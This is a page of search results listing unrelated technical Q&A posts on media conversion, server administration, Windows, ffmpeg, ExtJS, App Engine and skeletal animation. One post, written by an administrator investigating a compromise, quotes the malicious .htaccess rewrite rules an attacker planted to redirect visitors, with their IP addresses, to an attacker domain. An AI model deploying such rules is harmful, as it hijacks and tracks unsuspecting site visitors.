Search Results

Search found 558 results on 23 pages for 'varying'.


  • Preserve embedded album art when converting from .flac to .ogg

    - by Profpatsch
    I want to convert my archived .flac library to .ogg for daily use. Running find ./ -iname '*.flac' -print0 | xargs -0 -n1 oggenc -q6 on the root music folder and then deleting every .flac (I keep copies in the archive) seems straightforward; after trying it with one file, it worked and all of the tags were transferred too, except for one: embedded album art! I always prefer embedded covers over folder images, since I have some albums with varying covers. One possible solution is discussed here, but the script only works if the image is already extracted: Embed album art in OGG through command line in linux. One approach I thought about was extracting the album art from every song (not every song has one, though, and some have 2 or 3!), saving it temporarily, and then using the script to include it in the finished .ogg. But I also want to increase the number of processes xargs runs simultaneously to save time, so the temp images would need distinct names. Is there a (Linux) program that knows how to handle this? Or is there a finished script floating around somewhere? It would be nice if oggenc supported adding embedded cover art; it really is a shame, since these two formats should (in theory) share the same tag format. Edit: 15 days and no one has even tried to answer. It's funny, most of my questions don't get answered. Too hard? Wrong SE site?
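
    One possible approach (an untested sketch; the Python mutagen library is my assumption, the question never names a tool): run the oggenc pass first, then copy the embedded pictures across in a second pass over the tree, which avoids the need for uniquely named temp files entirely.

        import base64, glob, os
        from mutagen.flac import FLAC
        from mutagen.oggvorbis import OggVorbis

        for flac_path in glob.glob("**/*.flac", recursive=True):
            ogg_path = os.path.splitext(flac_path)[0] + ".ogg"
            if not os.path.exists(ogg_path):
                continue
            pictures = FLAC(flac_path).pictures        # embedded art, if any
            if not pictures:
                continue
            ogg = OggVorbis(ogg_path)
            # Vorbis comments carry cover art as base64-encoded FLAC picture blocks
            ogg["metadata_block_picture"] = [
                base64.b64encode(pic.write()).decode("ascii") for pic in pictures
            ]
            ogg.save()

    Since the copying happens per file in memory, it does not interfere with however many oggenc processes xargs runs in parallel.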

    Read the article

  • Would an array of SSD drives be able to successfully substitute for system memory?

    - by Florin Mircea
    I watched a few videos trying to answer this. This video (youtube.com/watch?v=eULFf6F5Ri8) shows a bunch of guys stacking 24 SSDs and reaching a peak of around 2 GB/s read/write. That's under the limit of the worst DDR3 in this list (memorybenchmark.net/write_ddr3_amd.html), which shows DDR3 memory performance varying from 2.78 to 6.55 GB per second - but that video is over 3 years old. This video (youtube.com/watch?v=27GmBzQWwP0) shows a more optimistic situation, but for PCI-E SSD drives: 5 drives peaking at around 4 GB/s. And this other video shows that stacking up more than 3 SSDs doesn't realistically offer substantial added performance. That, plus the fact that in all benchmarks the drives do quite poorly with small files (5 KB file read/write averaging from 10 to around 30-40 MB/s) compared to how native memory handles such files, seems to indicate a definite NO to this question. Also, the write life cycle is indeed limited and the drives might wear out quickly, as kindly pointed out by paddy. However, I wanted to get more opinions on this. Would it be possible to at least obtain current memory performance with SSDs in RAID 0? And if so, in what circumstances? I am assuming this configuration would be used with a Windows OS that has its memory pagefile resident on that stack of SSDs, making it very fast to work with.

    Read the article

  • Why is my cron daemon being killed every few minutes?

    - by user113215
    As of about a week ago, my cron daemon refuses to stay running. I'm using Debian 6 x64 on an OpenVZ virtual machine. Running something like pgrep cron shows that the daemon isn't running. I start the service with service cron start or /etc/init.d/cron start and it launches, but it disappears from the running process list after a few minutes (varying anywhere between 1 and 30 minutes before the process is killed again). Using strace -f service cron start, I can see that the process is being killed for some reason: nanosleep({60, 0}, <unfinished ...> +++ killed by SIGKILL +++ There's nothing relevant in /var/log/syslog, /var/log/messages, /var/log/auth.log, or /var/log/kern.log to explain why the process is dying. The system has at least 800 MB of free memory, and cat /proc/loadavg returns 0.22 0.13 0.04, so resources shouldn't be the issue. With cron running, free -m reports: total used free shared buffers cached Mem: 1024 211 812 0 0 0 -/+ buffers/cache: 211 812 Swap: 0 0 0 I also tried removing and reinstalling the cron package using apt-get. Update: I initially thought the problem was a resource issue. I erased my entire VPS and started from a fresh Debian image. There is now nothing else running on the system, but even from a clean install my cron daemon is still being killed at random. What else should I check? How do I find out what's killing my crond?
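
    A small watchdog sketch (my own suggestion, not from the thread; assumes Python 2.7+ and pgrep on the box) that at least records the exact moment crond vanishes, so the timestamp can be correlated with events on the OpenVZ hardware node; it does not identify the killer by itself:

        import datetime, subprocess, time

        def cron_pid():
            try:
                return subprocess.check_output(["pgrep", "-x", "cron"]).decode().strip()
            except subprocess.CalledProcessError:
                return None            # pgrep exits non-zero when nothing matches

        last = cron_pid()
        while True:
            current = cron_pid()
            if last and not current:
                stamp = datetime.datetime.now().isoformat()
                with open("/var/log/cron-watchdog.log", "a") as log:
                    log.write("cron (pid %s) vanished at %s\n" % (last, stamp))
            last = current
            time.sleep(5)

    On an OpenVZ guest it may also be worth asking the host's administrator whether anything on the hardware node (an out-of-memory killer or a process watchdog) is sending the SIGKILL, since that would never show up in the container's own logs.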

    Read the article

  • CPU operating temperature ranges

    - by osij2is
    I have an AMD Phenom II 960T with 2 cores unlocked for a total of 6 cores. I don't overclock at all. I have an Arctic Cooling ACALP64 heatsink/fan installed. I'm currently running ESXi 5.0, so I have to go into the BIOS to read the CPU temperatures, which at idle seem to be in the 71-74C range. To me, this is pretty high, but I cannot find any official temperature ranges that AMD says the CPU can work well within. There seem to be a lot of questions on Super User and numerous forums around CPU temperatures, but there is no clear consensus as to what the manufacturer temperature ranges are for specific CPUs. I've tried searching through AMD's site to no avail. At this point, I'd be willing to shut off the 2 extra cores if it keeps the heat down, but until I get some sort of tolerance or range for temperature, I have no idea if the CPU is being damaged or not. Can anyone point to a direct source, article, or FAQ from AMD that specifically states their CPUs' temperature range? Or are CPU temperature ranges so varying that there's no possible baseline? Am I being too paranoid about this? To me, anything over 65C is a bit much, and if I'm in the low-to-mid 70s range with NO VMs running, what can I expect when several VMs are running?

    Read the article

  • RDP: allow client reconnect without password prompt after several hours

    - by Tom
    Let me describe the setup first: a client PC with several RDP sessions to local servers, all opened from saved RDP files with stored passwords, using the standard Windows RDP client; several Windows servers on the LAN, with varying server OS: Windows Server 2003, 2008, and even 2012 now. When I log onto my PC I open up RDP sessions to all those servers and keep them open all the time for various reasons. Overnight the client PC is put into sleep or hibernate mode, thereby breaking the RDP connections. The next day, when I wake the client PC and log in again, the RDP sessions automatically try to reconnect to the servers, and this leads to the question: starting with Server 2008 something apparently changed in the RDP server config, as all servers with 2008, 2008 R2 and 2012 will prompt for the password in the RDP session, whereas the 2003 server RDP connections re-establish without the password prompt. Apparently there is a timeout setting on 2008+ that, when exceeded, requires reauthentication. Is there any way to set up the 2008+ servers to behave like 2003 did? I'd like the RDP sessions to reconnect without a password prompt even after a disconnect of several hours.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the Apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that URL (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing and have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so Apache or its plugins are likely the culprit; all the changes were made within 15 minutes of each other, so it was probably automated; since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site); if an .htaccess file already existed and was writeable by www-data, then the script was kind and simply appended the above lines to the end of the file (making it easy to reverse). Any more hints would be appreciated.
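
    A report-only sweep along these lines may help with cleanup while the hole is being hunted (a sketch; the /var/www root and the assumption that every injected block references the same hashed domain are mine):

        import os

        DOCROOT = "/var/www"        # adjust to the farm's real layout
        MARKER = "84f6a4eef61784b33e4acbd32c8fdd72.com"

        for root, dirs, files in os.walk(DOCROOT):
            if ".htaccess" not in files:
                continue
            path = os.path.join(root, ".htaccess")
            with open(path) as fh:
                lines = fh.readlines()
            if any(MARKER in line for line in lines):
                print("injected rewrite found in %s" % path)
                # Once the hits look right, filter out the injected lines and
                # write the file back, or unlink files www-data created outright.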

    Read the article

  • My laptop screen keeps dimming

    - by Rowland
    I have a Cryo laptop with Windows 7 installed, bought in December 2011. Sometimes the screen seems to persistently dim and/or brighten, even as I am doing things. In fact the brightness is varying even as I type this. The battery is always fully charged and the laptop is connected to the mains. I have checked the battery/power-saving settings many times, always leaving them the same way: full brightness and never dimming when on the mains. Yet when the screen starts playing up I can end up with it dimming and brightening almost continuously. I once went to the "adjust screen brightness" window when the screen had dimmed. I found the brightness slider on 100% (as I expected) but, as I dragged it to the left to dim the screen, it first brightened and then started dimming, i.e. the setting said 100% brightness but the screen was only at maybe 80%. I have checked with Cryo and they just say to check the power settings. I know what these are and how to work them, and I always set them to never dim/full brightness, yet my laptop still starts this dimming every so often.

    Read the article

  • Is it possible to use ffmpeg to trim off X seconds from the beginning of a video with an unspecified length?

    - by marcelebrate
    I need to trim just the first 1 or 2 seconds off a series of FLV recordings of varying, unspecified lengths. I've found plenty of resources for extracting a specified duration from a video (e.g. 30-second clips), but none for continuing to the end of a video. Both of these attempts just yield a copied version of the video, sans desired trimming: ffmpeg -ss 2 -vcodec copy -acodec copy -i input.flv output.flv ffmpeg -ss 2 -t 120 -vcodec copy -acodec copy -i input.flv output.flv The thought on the second one was: perhaps if I specified a length beyond what was possible, it'd just go to the end. No dice. I know it's not an issue with codecs or with using seconds instead of timecode, since the following worked a charm: ffmpeg -ss 2 -t 5 -vcodec copy -acodec copy -i input.flv output.flv Any other ideas? I'm open to using other (Windows-based) command line tools, however I'm strongly favoring ffmpeg since I'm already using it for thumbnail creation and am familiar with it. If it helps, my videos will all be under 2 minutes.
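
    For what it's worth, one reading of the symptom (my interpretation, not confirmed): options placed before -i are treated as input options, so the -ss and the copy codecs never apply to the output; moving them after the input and dropping -t lets ffmpeg copy through to the end. A batch sketch, with the caveat that seeking while stream-copying snaps to the nearest keyframe:

        import pathlib, subprocess

        def trim_head(src, dst, seconds=2):
            # No -t: ffmpeg copies from the seek point through to the end.
            subprocess.run([
                "ffmpeg", "-i", str(src),
                "-ss", str(seconds),
                "-vcodec", "copy", "-acodec", "copy",
                str(dst),
            ], check=True)

        for flv in pathlib.Path(".").glob("*.flv"):
            trim_head(flv, flv.with_name(flv.stem + "_trimmed.flv"))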

    Read the article

  • Methods and practices for managing a network that has no internet connection

    - by FaultyJuggler
    Originally asked on Super User but realized this belongs here. Long story short, I am setting up a network with 32 servers of varying specs that will be used for testing and development. We will be using RedHat Linux; we also do not have a router as of yet and are looking into making one of the servers act as our router/DHCP server, etc. The small cluster will be on an isolated network with no internet. I can use external hard drives and discs to transfer anything from external sources onto machines on the network, so this isn't a locked-down secure network, it just won't have a direct connection to the outside world. I've worked on such setups before, but always long after they were set up. So I'm reaching out to see what everyone knows as far as how groups have handled initial setup and maintenance of such a situation. What is the best way to get them all configured and up to date? What are the best ways to automate updates, network-wide installs, etc.? Given only that I have large multi-terabyte external hard drives that would be used to drop whatever files are needed onto a central server, how do I then distribute those files and install their contents? I've done Perl scripting, and some teammates have played with Puppet, so we aren't completely in the dark; I just wanted to avoid reinventing the wheel since this is a common challenge.
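
    As a starting point, even something this small keeps the "drop files on a central server, then fan them out" workflow scriptable (a sketch; the hostnames, paths and root SSH keys are assumptions on my part):

        import subprocess

        HOSTS = ["node%02d" % n for n in range(1, 33)]   # hypothetical naming scheme
        SOURCE = "/srv/drop/"      # where the external drive gets copied
        DEST = "/srv/drop/"

        for host in HOSTS:
            # Mirror the drop directory, then let each node install from it locally.
            subprocess.check_call(["rsync", "-a", "--delete", SOURCE,
                                   "root@%s:%s" % (host, DEST)])
            # e.g. subprocess.check_call(["ssh", "root@%s" % host,
            #     "yum -y --disablerepo='*' localinstall /srv/drop/*.rpm"])

    The usual longer-term shape for offline RedHat networks is a local yum repository: run createrepo over the drop directory on the central server, export it over HTTP or NFS, and point every node's .repo file at it, so updates become a normal yum transaction.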

    Read the article

  • Reactive Extensions vs FileSystemWatcher

    - by Joel Mueller
    One of the things that has long bugged me about the FileSystemWatcher is the way it fires multiple events for a single logical change to a file. I know why it happens, but I don't want to have to care - I just want to reparse the file once, not 4-6 times in a row. Ideally, there would be an event that only fires when a given file is done changing, rather than every step along the way. Over the years I've come up with various solutions to this problem, of varying degrees of ugliness. I thought Reactive Extensions would be the ultimate solution, but there's something I'm not doing right, and I'm hoping someone can point out my mistake. I have an extension method: public static IObservable<IEvent<FileSystemEventArgs>> GetChanged(this FileSystemWatcher that) { return Observable.FromEvent<FileSystemEventArgs>(that, "Changed"); } Ultimately, I would like to get one event per filename, within a given time period - so that four events in a row with a single filename are reduced to one event, but I don't lose anything if multiple files are modified at the same time. BufferWithTime sounds like the ideal solution. var bufferedChange = watcher.GetChanged() .Select(e => e.EventArgs.FullPath) .BufferWithTime(TimeSpan.FromSeconds(1)) .Where(e => e.Count > 0) .Select(e => e.Distinct()); When I subscribe to this observable, a single change to a monitored file triggers my subscription method four times in a row, which rather defeats the purpose. If I remove the Distinct() call, I see that each of the four calls contains two identical events - so there is some buffering going on. Increasing the TimeSpan passed to BufferWithTime seems to have no effect - I went as high as 20 seconds without any change in behavior. This is my first foray into Rx, so I'm probably missing something obvious. Am I doing it wrong? Is there a better approach? Thanks for any suggestions...
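
    If it helps to see the intent outside Rx, here is the same "one event per file after a quiet period" idea as a plain Python sketch; in Rx terms this maps more closely to grouping by file name and throttling each group than to BufferWithTime (that mapping is my reading, not something from the post):

        import time

        QUIET = 1.0        # seconds of silence before a file counts as "done changing"
        last_seen = {}     # path -> timestamp of the most recent raw notification

        def on_raw_change(path):
            # Called for every noisy FileSystemWatcher-style event.
            last_seen[path] = time.time()

        def flush_settled(handle):
            # Called periodically; fires handle(path) once per settled file.
            now = time.time()
            for path, stamp in list(last_seen.items()):
                if now - stamp >= QUIET:
                    del last_seen[path]
                    handle(path)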

    Read the article

  • Ext.data.Store, Javascript Arrays and Ext.grid.ColumnModel

    - by Michael Wales
    I am using Ext.data.Store to call a PHP script which returns a JSON response with some metadata about fields that will be used in a query (unique name, table, field, and user-friendly title). I then loop through each of the Ext.data.Record objects, placing the data I need into an array (this_column), pushing that array onto the end of another array (columns), and eventually passing this to an Ext.grid.ColumnModel object. The problem I am having is that no matter which query I test against (I have a number of them, varying in size and complexity), the columns array always works as expected up to columns[15]. At columns[16], that index and all previous ones are filled with the value of columns[15]. This behavior continues until the loop reaches the end of the Ext.data.Store object, at which point the entire array consists of the same value. Here's some code: columns = []; this_column = []; var MetaData = Ext.data.Record.create([ {name: 'id'}, {name: 'table'}, {name: 'field'}, {name: 'title'} ]); // Query the server for metadata for the query we're about to run metaDataStore = new Ext.data.Store({ autoLoad: true, reader: new Ext.data.JsonReader({ totalProperty: 'results', root: 'fields', id: 'id' }, MetaData), proxy: new Ext.data.HttpProxy({ url: 'index.php/' + type + '/' + slug }), listeners: { 'load': function () { metaDataStore.each(function(r) { this_column['id'] = r.data['id']; this_column['header'] = r.data['title']; this_column['sortable'] = true; this_column['dataIndex'] = r.data['table'] + '.' + r.data['field']; // This displays valid information through the entire process console.info(this_column['id'] + ' : ' + this_column['header'] + ' : ' + this_column['sortable'] + ' : ' + this_column['dataIndex']); columns.push(this_column); }); // This goes nuts at columns[15] console.info(columns); gridColModel = new Ext.grid.ColumnModel({ columns: columns });
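
    One thing worth checking (my guess at the cause, not confirmed in the post): this_column is created once and mutated on every iteration, so every element pushed into columns is the same object and ends up showing the last row's values. The same trap, written out in Python:

        columns = []
        this_column = {}
        for title in ["id", "table", "field"]:
            this_column["header"] = title      # mutates the one shared object
            columns.append(this_column)
        print(columns)   # three references to the same dict, all showing "field"

        # Creating a fresh object inside the loop fixes it:
        columns = []
        for title in ["id", "table", "field"]:
            columns.append({"header": title})
        print(columns)   # [{'header': 'id'}, {'header': 'table'}, {'header': 'field'}]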

    Read the article

  • Changing size of content in HorizontalScrollView when phone is rotated by overriding onConfigurationChanged

    - by Emil Arfvidsson
    Hello, I have a problem with resizing content in a HorizontalScrollView when the phone is rotated. I'm overriding onConfigurationChanged in the activity containing the HorizontalScrollView, since I want to handle the resizing myself. However, I'm having great trouble finding where I should put the resizing of the content. The HorizontalScrollView itself has FILL_PARENT as its width and a fixed height. The idea is that it should always fill the screen width-wise, while having several cells of content, each as wide as the HorizontalScrollView itself. The content of my HorizontalScrollView consists of one LinearLayout (let's call it wrapperLayout) with several LinearLayouts inside it. When the phone rotates I simply want to change the width of all the LinearLayouts inside the wrapperLayout. This is easy to do and works great when I test the resizing code by putting it in onInterceptTouchEvent(MotionEvent ev); that is, the views are resized just as they are supposed to be when I touch the HorizontalScrollView. The difficulty appears when I try to find a good spot to execute the resizing code so that the resizing happens automatically when the phone is rotated. I have tried all possible combinations of requestLayout, onSizeChanged, onLayout, onConfigurationChanged and a few others, varying their calls to super (if any) before and after the resizing code. I cannot make this work (the views are not resized even though the resize code is executed) and it is really frustrating. I've done a lot of logging to make sure the HorizontalScrollView really has changed width before calling my resize code, but to no avail. Does anyone have any clue as to what is going on? What methods are called, and in what order, when I handle onConfigurationChanged myself like this? Thanks in advance

    Read the article

  • Serializing type definitions?

    - by Dave
    I'm not positive I'm going about this the right way. I've got a suite of applications that have varying types of output (custom-defined types). For example, I might have a type called Widget: Class Widget Public name as String End Class Throughout the course of operation, when a user experiences a certain condition, the application will take the output instance of Widget that the user received, serialize it, and log it to the database, noting the name of the type. Now, I have other applications that do something similar, but instead of dealing with Widget, it could be some totally random other type with different attributes; again I serialize the instance, log it to the db, and note the name of the type. I have maybe a half dozen different types and don't anticipate too many additional ones in the future. After all this is said and done, I have an admin interface that looks through these logs and lets the user view the contents of the data that's been logged. The admin app has a reference to all the types involved and, with some basic switch-case logic hinged on the name of the type, casts each entry back into its original type and passes it on to handlers with basic display logic that spit the data back out in a readable format (one display handler for each type). NOW... all this is well and good... until one day, my model changed. The Widget class has now deprecated the name attribute and added a bunch of other attributes. I will of course get type mismatches on the admin side when I try to reconstitute this data. I was wondering if there is some way, at runtime, I could reflect through my code and get a snapshot of the type definition at that precise moment, serialize it, and store it along with the data so that I could somehow use it to reconstitute the data in the future?
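
    The underlying idea, stripped of the .NET specifics (a concept sketch in Python, not the asker's language): capture the field names alongside the payload at log time, so the admin side can still render old records after the class definition moves on.

        import json

        class Widget(object):
            def __init__(self, name):
                self.name = name

        def log_instance(obj):
            record = {
                "type": type(obj).__name__,
                "schema": sorted(vars(obj)),   # snapshot of the type definition, such as it is
                "data": vars(obj),
            }
            return json.dumps(record)

        print(log_instance(Widget("sprocket")))
        # {"type": "Widget", "schema": ["name"], "data": {"name": "sprocket"}}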

    Read the article

  • Nesting gridview/formview in webuser control inside a parent gridview

    - by Stuart
    Hi, I'm developing an ASP.NET 2 website for our HR department, where the front page has a matrix of all our departments against pay grades, with links in each cell to all the jobs for that department at that grade. These links take you to a page with a gridview populated dynamically, as each department has a different number of teams, e.g. Finance has one team, IT has four. Each cell has a web user control inserted into it. The user control has a SQL datasource pulling out all the job titles and the primary key, populating a formview with a linkbutton whose text value is bound to the job title. (I'm using a user control as this page will also be used to show the results of a search of all roles in a range of grades for a department, and will have a varying number of rows.) I've got everything to display nicely, but when I click on the linkbutton, instead of running the code I've put in the Click event, the page posts back without firing any events. Having looked around, it looks like I have to put an AddHandler line in somewhere, but I'm not sure where; could anyone give me some pointers please? (Fairly numpty level please, I'm not too experienced in ASP yet and am winging it. I'm also using VB but C# isn't a problem.) This is how I'm inserting the controls into the parent grid; have I missed anything obvious? For row As Int16 = 0 To dgvRoleGrid.Rows.Count - 1 tempwuc = New UserControl tempwuc = LoadControl("wucRoleList.ascx") tempwuc.ID = "wucRoleList" & col.ToString tempwuc.EnableViewState = True dgvRoleGrid.Rows(row).Cells(col).Controls.Add(tempwuc) CType(dgvRoleGrid.Rows(row).FindControl(tempwuc.ID), wucRoleList).specialtyid = specid CType(dgvRoleGrid.Rows(row).FindControl(tempwuc.ID), wucRoleList).bandid = dgvRoleGrid.DataKeys(row)(0) CType(dgvRoleGrid.Rows(row).FindControl(tempwuc.ID), wucRoleList).familyid = Session("familyid") Next

    Read the article

  • How to display two series via Google Chart API?

    - by Chris
    I can't get the two series of numbers to scale together. Here is sample code that you can paste into http://code.google.com/intl/en/apis/chart/docs/chart_playground.html cht=lxy chs=400x300 chd=t:20,30,40|1,4,2|24,34,44|3,7,1 chds=20,40,1,4,24,44,1,7 chxr=0,20,54,2|1,0,7,1 chxt=x,y chxs=0,ff0000,12,0,lt 1,0000ff,10,1,lt chco=FF0000,00FF00 chdl=Apples Oranges chtt=Some+Values chts=0000ff,24 Translated: chd=t:<series_1>|<series_2>|... (or s:<series_1>,<series_2>,... or e:<series_1>,<series_2>,...) chds=<series_1_min>,<series_1_max>,... chxr=<axis_index>,<start_val>,<end_val>,<step>|... The three varying parameters in question are: chd=t:20,30,40|1,4,2|24,34,44|3,7,1 chds=20,40,1,4,24,44,1,7 chxr=0,20,54,2|1,0,7,1 Can anyone get this simple example working? The chart supports multiple series, but for some reason I can't scale it so that the values are displayed within scale. Any help appreciated, Chris
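
    One way to reason about it (my interpretation, not a confirmed fix): giving each series its own min/max in chds scales them independently, so computing a single shared range and repeating it for every series keeps the two lines comparable. A small Python sketch of that bookkeeping:

        series = {
            "Apples":  ([20, 30, 40], [1, 4, 2]),
            "Oranges": ([24, 34, 44], [3, 7, 1]),
        }

        xs = [v for x, _ in series.values() for v in x]
        ys = [v for _, y in series.values() for v in y]
        x_lo, x_hi = min(xs), max(xs)
        y_lo, y_hi = min(ys), max(ys)

        chd = "t:" + "|".join(
            ",".join(map(str, x)) + "|" + ",".join(map(str, y))
            for x, y in series.values()
        )
        # the same x range and y range repeated for every series
        chds = ",".join(str(v) for v in (x_lo, x_hi, y_lo, y_hi) * len(series))
        print("chd=" + chd)     # chd=t:20,30,40|1,4,2|24,34,44|3,7,1
        print("chds=" + chds)   # chds=20,44,1,7,20,44,1,7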

    Read the article

  • Mocking WebResponse's from a WebRequest

    - by Rob Cooper
    I have finally started messing around with creating some apps that work with RESTful web interfaces; however, I am concerned that I am hammering their servers every time I hit F5 to run a series of tests. Basically, I need to get a series of web responses so I can test that I am parsing the varying responses correctly. Rather than hit their servers every time, I thought I could do this once, save the XML, and then work locally. However, I don't see how I can "mock" a WebResponse, since (AFAIK) they can only be instantiated by WebRequest.GetResponse. How do you guys go about mocking this sort of thing? Do you? I just really don't like the fact that I am hammering their servers :S I don't want to change the code too much, but I expect there is an elegant way of doing this.. Update (following accept): Will's answer was the slap in the face I needed; I knew I was missing a fundamental point! Create an interface that will return a proxy object which represents the XML. Implement the interface twice: one implementation that uses WebRequest, the other that returns static "responses". The interface implementation then either instantiates the return type based on the response, or on the static XML. You can then pass the required class to the service layer when testing or in production. Once I have the code knocked up, I'll paste some samples. Thanks Will :)
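
    The pattern from the update, written out as a language-neutral sketch in Python (the question is C#, so this is only the shape of it): one gateway interface, one implementation that does real HTTP, one that replays saved XML.

        import abc

        class ResponseSource(abc.ABC):
            @abc.abstractmethod
            def fetch(self, url):
                """Return the raw XML body for url."""

        class LiveSource(ResponseSource):
            def fetch(self, url):
                from urllib.request import urlopen      # the real network hit
                return urlopen(url).read()

        class CannedSource(ResponseSource):
            def __init__(self, fixtures):
                self.fixtures = fixtures                 # url -> path of saved XML

            def fetch(self, url):
                with open(self.fixtures[url], "rb") as fh:
                    return fh.read()

        # Tests construct the parser with CannedSource({...}); production code uses
        # LiveSource(), and the REST servers are only hit when new fixtures are saved.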

    Read the article

  • How do I use a .NET class in VBA? Syntax help!

    - by Jordan S
    OK, I have a couple of .NET classes that I want to use in VBA, so I must register them through COM and all that. I think I have the COM registration figured out (finally), but now I need help with the syntax for creating the objects. Here is some pseudocode showing what I am trying to do. EDIT: Changed AttachedObjects to return an ArrayList instead of a List. The .NET classes look like this... public class ResourceManagment { public ResourceManagment() { // Default Constructor } public static ArrayList AttachedObjects() { ArrayList list = new ArrayList(); return list; } } public class RandomObject { // public RandomObject(int someParam) { } } OK, so this is what I would like to do in VBA (demonstrated in C#) but I don't know how... public class VBAClass { public void main() { ArrayList myList = ResourceManagment.AttachedObjects(); foreach(RandomObject x in myList) { // Do something with RandomObject x like list them in a Combobox } } } One thing to note is that RandomObject does not have a public default constructor, so I cannot create an instance of it like Dim x As New RandomObject. MSDN says that you cannot instantiate an object that doesn't have a default constructor through COM, but you can still use the object type if it is returned by another method... Types must have a public default constructor to be instantiated through COM. Managed, public types are visible to COM. However, without a public default constructor (a constructor without arguments), COM clients cannot create an instance of the type. COM clients can still use the type if the type is instantiated in another way and the instance is returned to the COM client. You may include overloaded constructors that accept varying arguments for these types. However, constructors that accept arguments may only be called from managed (.NET) code. Added: Here is my attempt in VB: Dim count As Integer count = 0 Dim myObj As New ResourceManagment For Each RandomObject In myObj.AttachedObjects count = count + 1 Next RandomObject

    Read the article

  • File Uploading In Google Application Engine Using Django

    - by Ayush
    I am using GAE with Django. I have a project named MusicSite with the following URL mapping- urls.py from django.conf.urls.defaults import * from MusicSite.views import MainHandler from MusicSite.views import UploadHandler from MusicSite.views import ServeHandler urlpatterns = patterns('',(r'^start/', MainHandler), (r'^upload/', UploadHandler), (r'^/serve/([^/]+)?', ServeHandler), ) There is an application MusicSite inside MusicFun with the following code- views.py import os import urllib from google.appengine.ext import blobstore from google.appengine.ext import webapp from google.appengine.ext.webapp import blobstore_handlers from google.appengine.ext.webapp import template from google.appengine.ext.webapp.util import run_wsgi_app def MainHandler(request): response=HttpResponse() upload_url = blobstore.create_upload_url('http://localhost:8000/upload/') response.write('') response.write('' % upload_url) response.write("""Upload File: """) return HttpResponse(response) def UploadHandler(request): upload_files=request.FILES['file'] blob_info = upload_files[0] response.redirect('http://localhost:8000/serve/%s' % blob_info.key()) class ServeHandler(blobstore_handlers.BlobstoreDownloadHandler): def get(self, resource): resource = str(urllib.unquote(resource)) blob_info = blobstore.BlobInfo.get(resource) self.send_blob(blob_info)
    Now whenever I upload a file using /start and click Submit I am taken to a blank page with the following URL: localhost:8000/_ah/upload/ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yGwsSFV9fQmxvYlVwbG9hZFNlc3Npb25fXxgHDA These random characters keep varying but the result is the same: a blank page after every upload. Somebody please help. The server responses are as below: INFO:root:"GET /start/ HTTP/1.1" 200 - INFO:root:"GET /favicon.ico HTTP/1.1" 404 - INFO:root:Internal redirection to http://localhost:8000/upload/ INFO:root:Upload handler returned 500 ERROR:root:Invalid upload handler response. Only 301, 302 and 303 statuses are permitted and it may not have a content body. INFO:root:"POST /_ah/upload/ahhnb29nbGUtYXBwLWVuZ2luZS1kamFuZ29yGwsSFV9fQmxvYlVwbG9hZFNlc3Npb25fXxgCDA HTTP/1.1" 500 - INFO:root:"GET /favicon.ico HTTP/1.1" 404 -
    Read the article

  • sIFR3: controlling a and a:hover styles inside replaced through CSS rather than JS

    - by sneeuwitje
    For graceful degrading and minimal coding for the sIFR feature on my websites, I want to define styles in CSS as much as possible. Here's what I do: define an H3 tag to be replaced by sIFR3. H3 comes in varying colors via CSS depending on its container, say body.blue-txt h3{ color: #009CDA; } body.white-txt h3{ color: #FFFFFF; } body.etc... H3 might contain an anchor (I'm aware of the semantic issues, but that's just how it is ... sorry). With sIFR.useStyleCheck = true; sIFR3 will show replaced normal H3 text with the correct color, but when it contains a link, it shows the Flash default #0000FF .... All fine; I can tweak e.g. blue text in sifr-config.js by using the css parameter for sIFR.replace(): sIFR.replace(futura, { selector: 'body.blue-txt h3', css: 'a {color: #009CDA; }, a:hover { color: #009CDA; text-decoration: underline; }' }); But that would have to be coded for every single text color in my sIFR replacements, in both JS and CSS. So I would want the sIFR.useStyleCheck setting to just respect the CSS in sifr-config.css, like: body.blue-txt h3{ color: #009CDA; } body.blue-txt h3 a{ color: #009CDA; } body.blue-txt h3 a:hover{ color: #009CDA; text-decoration: underline; } Only this doesn't seem to work ... the link text keeps popping up as #0000FF and the hover is not underlined. Is this just Not A Feature (Yet), or am I doing something wrong?

    Read the article

  • How to export bind and keyframe bone poses from Blender to use in OpenGL

    - by SaldaVonSchwartz
    EDIT: I decided to reformulate the question in much simpler terms to see if someone can give me a hand with this. Basically, I'm exporting meshes, skeletons and actions from blender into an engine of sorts that I'm working on. But I'm getting the animations wrong. I can tell the basic motion paths are being followed but there's always an axis of translation or rotation which is wrong. I think the problem is most likely not in my engine code (OpenGL-based) but rather in either my misunderstanding of some part of the theory behind skeletal animation / skinning or the way I am exporting the appropriate joint matrices from blender in my exporter script. I'll explain the theory, the engine animation system and my blender export script, hoping someone might catch the error in either or all of these. The theory: (I'm using column-major ordering since that's what I use in the engine cause it's OpenGL-based) Assume I have a mesh made up of a single vertex v, along with a transformation matrix M which takes the vertex v from the mesh's local space to world space. That is, if I was to render the mesh without a skeleton, the final position would be gl_Position = ProjectionMatrix * M * v. Now assume I have a skeleton with a single joint j in bind / rest pose. j is actually another matrix. A transform from j's local space to its parent space which I'll denote Bj. if j was part of a joint hierarchy in the skeleton, Bj would take from j space to j-1 space (that is to its parent space). However, in this example j is the only joint, so Bj takes from j space to world space, like M does for v. Now further assume I have a a set of frames, each with a second transform Cj, which works the same as Bj only that for a different, arbitrary spatial configuration of join j. Cj still takes vertices from j space to world space but j is rotated and/or translated and/or scaled. Given the above, in order to skin vertex v at keyframe n. I need to: take v from world space to joint j space modify j (while v stays fixed in j space and is thus taken along in the transformation) take v back from the modified j space to world space So the mathematical implementation of the above would be: v' = Cj * Bj^-1 * v. Actually, I have one doubt here.. I said the mesh to which v belongs has a transform M which takes from model space to world space. And I've also read in a couple textbooks that it needs to be transformed from model space to joint space. But I also said in 1 that v needs to be transformed from world to joint space. So basically I'm not sure if I need to do v' = Cj * Bj^-1 * v or v' = Cj * Bj^-1 * M * v. Right now my implementation multiples v' by M and not v. But I've tried changing 